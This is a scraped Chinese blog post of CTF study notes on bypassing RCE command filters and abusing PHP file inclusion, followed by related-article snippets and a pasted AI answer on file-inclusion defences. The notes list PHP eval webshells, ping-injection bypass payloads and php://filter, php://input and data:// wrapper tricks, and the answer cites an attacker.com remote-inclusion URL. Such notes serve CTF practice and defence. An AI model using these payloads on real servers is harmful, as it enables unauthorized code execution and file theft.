RCE过滤及文件包含

最新推荐文章于 2025-04-13 10:36:24 发布
最新推荐文章于 2025-04-13 10:36:24 发布
阅读量1.7k 收藏 10
点赞数 5
文章标签: php linux vim
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51313108/article/details/119703243
版权

CTF中的一些RCE过滤

有关RCE的题目

BUUCTF pingpingping
ctfhub RCE

过滤的思考

RCE命令执行<?php @eval(GET['cmd']); ?>。一句话木马可以执行PHP函数来找到flag。
命令执行phpinfo()中的disable_function函数可以查看被过滤的函数。

本地执行

var_dump()函数

以下函数都要在var_dump()函数内执行

  • scandir()
  • file_get_contents()
  • readfile()

无参数函数执行

system()调用外部命令的过滤

管道符的妙用

; & && | ||:这些管道符衔接其他命令可以执行一些Linux代码
||:直接衔接Linux命令实现跳出ping,可见如下博客
buuctf_LinuxRCE_Ping Ping Ping

;分号被过滤

分号被过滤,使用%0a绕过

cat被过滤

ca\t:利用正则表达式的\,\后面跟正常字符

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容

以上都被过滤还有grepLinux的grep

空格被过滤

可以使用<>绕过,或者在url中使用%09(Tab),%20(space)
${IFS}$IFS$9进行绕过.

flag被过滤

利用通配符来绕过:

匹配任何字符串/文本,包括空字符串;
*代表任意字符(0个或多个)
? 匹配任何一个字符(不在括号内时)?代表任意1个字符
[abcd] 匹配abcd中任何一个字符
[a-z] 表示范围a到z,表示范围的意思 []匹配中括号中任意一个字符

利用拼接绕过:
在linux下:a=who;b=ami;$a$b等效于执行whoami
我们只要在定义时候把flag的顺序调整一下就好了即:b=ag;a=fl;$a$b
跑一下是试试看:xxxx/?ip=||b=ag;a=fl;cat$IFS$9$a$b.php

文件包含

文件包含漏洞

?file=文件 可能存在文件包含漏洞和PHP中有include函数出现

漏洞利用–封装协议

因为漏洞的存在,我们可以从中获取我们想要得到的资源。CTF中常用的php伪协议利用

  1. 读取敏感本地文件
    方法:直接打开敏感文件;利用一句话木马<?php @eval($_POST['attack']);?>获得更大操作权限
  2. PHP封装协议
    1. ?file=php://filter/read=convert.base64-encode/resource=config.php它可以读取对应文件源代码,得到的结果经过Base64解密后得到的是config.php源代码
    2. ?file=php://input 写入PHP文件。它受限于allow_url_include选项。php://input可以读取没有处理过的POST数据。
      在这里插入图片描述
    ?file=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=,d2VsY29tZSB0byB0aGUgempjdGY=是welcome to the zjctf。它和http://input一样都可以把一些内容写入其中。
$file = $_GET["file"];

$content1 = file_get_contents($file,'r');
echo $content1;  // 输出结果是:welcome to the ctf

$content2 = file_get_contents('php://input');
echo $content2;  // 输出结果是:welcome to the ctf

4.file:///var/www/html/flag.php读取本地文件,路径要是相对路径。可用于读取web目录下的文件。

参考博客

RCE漏洞之绕过
pingpingping
命令执行(RCE)面对各种过滤,骚姿势绕过总结

【网络安全】RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 3181
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
文件包含漏洞攻防
Chenamao的博客
08-05 1141
目录 文件包含 PHP中的文件包含语句: 漏洞原理及特点 文件包含漏洞攻防 文件包含漏洞利用 读取敏感文件 直接包含图片木马 PHP封装协议 *读取本地文件: *读取PHP文件源码 利用php://input执行PHP命令 漏洞修复方案 文件包含 名词解释:程序开发人员通常会把可重复使用的函数或语句写到单个文件中,在使用某个功能的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动.
对文件进行过滤操作
JGnewbie的博客
07-05 483
File h = new File("D:\\01"); File[] g = h.listFiles(new FilenameFilter() { @Override public boolean accept(File dir, String name) { return name.endsWit...
文件包含(CTFshow 刷题记录)持续更新
最新发布
2401_84893440的博客
04-13 2036
Session控制:通过PHPSESSID​指定文件名,注入恶意代码。竞争窗口:在PHP删除前包含文件,需毫秒级并发请求。绕过过滤:直接路径包含,避免使用被过滤字符。
RCE 注入过滤
qq_43613772的博客
04-02 1691
一、命令连接符: 1、";”:执行完前面的语句再执行后面的语句。 2、“|”:显示后面语句的执行结果。 3、“||”:当前面的语句执行出错时,执行后面的语句。 4、“&”:两条命令都执行,如果前面的语句为假则执行执行后面的语句,前面的语句可真可假。 5、“&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。 6、%0...
Web安全实战系列:文件包含漏洞
gclome的博客
11-07 600
**本文转自:freebuf 山东安山** 前言 《Web安全实战》系列集合了WEB类常见的各种漏洞,笔者根据自己在Web安全领域中学习和工作的经验,对漏洞原理和漏洞利用面进行了总结分析,致力于漏洞准确性、丰富性,希望对WEB安全工作者、WEB安全学习者能有所帮助,减少获取知识的时间成本。 0x01 文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件...
文件包含过滤php,文件包含漏洞---php协议
weixin_32480335的博客
03-21 790
一、原理1、概念:在php代码中,总会有一些代码我们会经常用到,这时引入了文件包含函数,可以通过文件包含函数把这些代码文件包含进来,直接使用文件中的代码,这样提高了我们的工作效率。2、文件包含函数:include():如果发生错误,会产生一个警告然后继续执行脚本include_once():与include()相同,如果文件之前被包含过则不再包含require():会停止执行代码require_o...
第52天:代码审计-PHP项目类RCE文件包含下载删除1
08-03
本文主要探讨了PHP项目中常见的安全漏洞类型,包括远程代码执行(RCE)、文件包含、下载、删除等,并提供了相关的漏洞利用关键字和实例分析。 首先,SQL注入是由于不当处理用户输入导致的数据库操作漏洞。关键词如`...
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 1076
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
【代码审计】——PHP项目类RCE文件包含下载删除
haoaaao的博客
08-06 1313
代码审计——PHP项目类RCE文件包含下载删除
RCE:命令注入 过滤空格 远程代码执行 php://input 读取源代码
qq_69100706的博客
08-12 979
命令注入是一种常见的技巧,用于实现远程代码执行(RCE)。命令注入发生在Web应用或服务接受用户输入并将其用于执行操作系统命令的场景中,如果用户输入未被妥善清理或验证,攻击者可以注入额外的命令,从而执行任意代码。
文件包含篇——防护
bylfsj的博客
09-23 596
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通...
文件包含(CTF)
热门推荐
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
文件包含漏洞及防御
慕舟舟的博客
03-23 2498
出现的问题:可能会导致允许访问敏感文件或者执行恶意代 码,造成漏洞;这就被称为文件包含漏洞;文件包含漏洞是一种常见的Web应用程序漏洞,允许恶意用户通过在URL或表单字段中注入恶意代码来访问和执行服务器上的文件。这种漏洞通常出现在PHP等动态网页语言中,当应用程序使用用户提供的输入直接包含文件时容易发生。攻击者利用文件包含漏洞可以执行各种恶意操作,比如读取敏感文件、执行系统命令、获取数据库信息等。
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 298
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
命令执行(RCE)面对各种过滤,骚姿势绕过总结
HUANGXIN9898的博客
07-09 3049
RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
grep 管道符的过滤和反向过滤
Huc673619的博客
10-14 1620
过滤 | grep 反向过滤 | grep -v
RCE漏洞之绕过
h0ld1rs的博客
10-27 6285
文章目录花括号斜杠空格过滤一些命令分隔符黑名单绕过拼接绕过编码绕过单引号和双引号绕过利用Shell 特殊变量绕过linux中直接查看文件内容的工具文件构造 花括号 {} 在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag} 斜杠 路径 / \是在正则等语法里面,表示后面跟的字符是正常字符,不需要转义。 也就意味着,我们可以在rce漏洞,过滤掉cat ls等命令时候,直接使用ca\t来实现绕过 空格过滤 < 、<>、%20(spac
CTFHub | RCE
m0_60651303的博客
08-11 170
在没有上传点时利用shell.php得到flag,可以用 burpsuite 来进行抓包,在BP上面改包,添加上我们想要的shell.php的内容,但添加的内容是以 post数据流存在的,没有以代码的方式执行。2、“||”:如果前面的语句为假,才执行后面的语句。后台直接执行系统命令,一般要结合linux,windows对要执行的命令进行拼接。4、“&&”:如果前面语句为假,不执行后面语句;3、“&”两条命令都执行,如果前面为假则直接执行后面的语句。1、“|”:直接执行后面的语句。利用两个分号同时进行。
rce文件包含
03-21
<think>好的,我现在需要回答用户关于RCE文件包含漏洞的原理及防御措施的问题。首先,我需要回忆一下文件包含漏洞的基本概念和相关知识。文件包含漏洞通常分为本地文件包含(LFI)和远程文件包含(RFI),而RCE可能指的是远程代码执行,但用户提到的“RCE文件包含漏洞”可能是指通过文件包含导致的远程代码执行。需要确认这两者的关系,但通常RFI可以导致RCE。 接下来,我需要查找文件包含漏洞的原理。根据引用[2]中提到,这种漏洞发生在应用程序使用动态文件包含的情况下,攻击者需要满足两个条件:一是应用程序未对用户输入进行严格验证,二是包含的文件路径可控。这可能涉及到用户输入的参数被直接用于包含文件,如PHP中的include、require等函数。 然后,防御措施方面,引用[1]提到需要输入验证、减少对外部参数的依赖、使用绝对路径等。例如,对用户输入的文件名进行白名单校验,限制包含路径,或者禁用远程文件包含功能。同时,引用[3]中给出的例子是设置安全配置,比如Tomcat的AJP密钥,这可能与特定服务器的配置相关,但同样强调了安全配置的重要性。 用户的问题可能希望了解文件包含漏洞如何导致远程代码执行,以及如何防御。需要将原理部分详细说明,比如攻击者如何通过包含恶意文件执行代码,特别是在RFI的情况下,攻击者可以远程服务器上的文件,导致代码执行。防御措施则需要综合引用中的建议,包括输入验证、路径限制、安全配置等。 另外,用户提供的引用中有一些关于文件包含漏洞的防御措施,可能需要整合这些信息,例如输入验证和绝对路径的使用,同时结合禁用不必要的动态包含功能。需要确保回答的结构清晰,先讲原理,再讲防御措施,最后相关问题。同时注意使用正确的LaTeX格式,如变量用$...$,独立公式用$$...$$,但在这个问题中可能数学公式较少,但如果有涉及变量或代码的地方需要正确标注。 最后,生成相关问题时要考虑用户可能进一步想知道的内容,比如如何检测漏洞、实际案例或具体配置方法等。确保问题相关且有引导性。</think>### RCE文件包含漏洞原理及防御措施 #### 1. 漏洞原理 **文件包含漏洞**分为本地文件包含(LFI)和远程文件包含(RFI)。其核心原理是应用程序未对用户输入的文件路径进行严格校验,直接将其用于动态包含文件(如PHP的`include`、`require`函数)。攻击者可通过构造恶意路径实现以下攻击: - **本地文件包含(LFI)**:读取服务器敏感文件(如`/etc/passwd`)[^2]。 - **远程文件包含(RFI)**:通过包含远程服务器上的恶意脚本(如`http://attacker.com/shell.php`),触发远程代码执行(RCE)。 **触发条件**: 1. 应用程序使用动态文件包含功能且未过滤输入(如`include($_GET['file'])`)。 2. 包含路径可被用户控制(如通过URL参数传递文件名)。 #### 2. 防御措施 **① 输入验证与过滤** - 对用户输入的文件名进行白名单校验,仅允许特定字符或固定后缀(如`.php`)。 - 使用正则表达式过滤`../`等路径遍历字符,防止越权访问。 **② 限制文件包含范围** - 使用绝对路径而非相对路径,例如: ```php include(__DIR__ . '/templates/' . $file); // 限制包含目录为/templates/ ``` - 禁用远程文件包含功能(如PHP中设置`allow_url_include=Off`)。 **③ 最小化动态包含依赖** - 避免直接使用外部参数(如`$_GET`、`$_POST`)作为包含路径,改用固定映射关系(如通过`switch`语句匹配预设文件名)[^1]。 **④ 安全配置与加固** - 设置Web服务器权限,限制敏感目录的读写权限。 - 定期更新应用程序和服务器环境,修复已知漏洞(如Tomcat AJP协议的安全配置[^3])。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值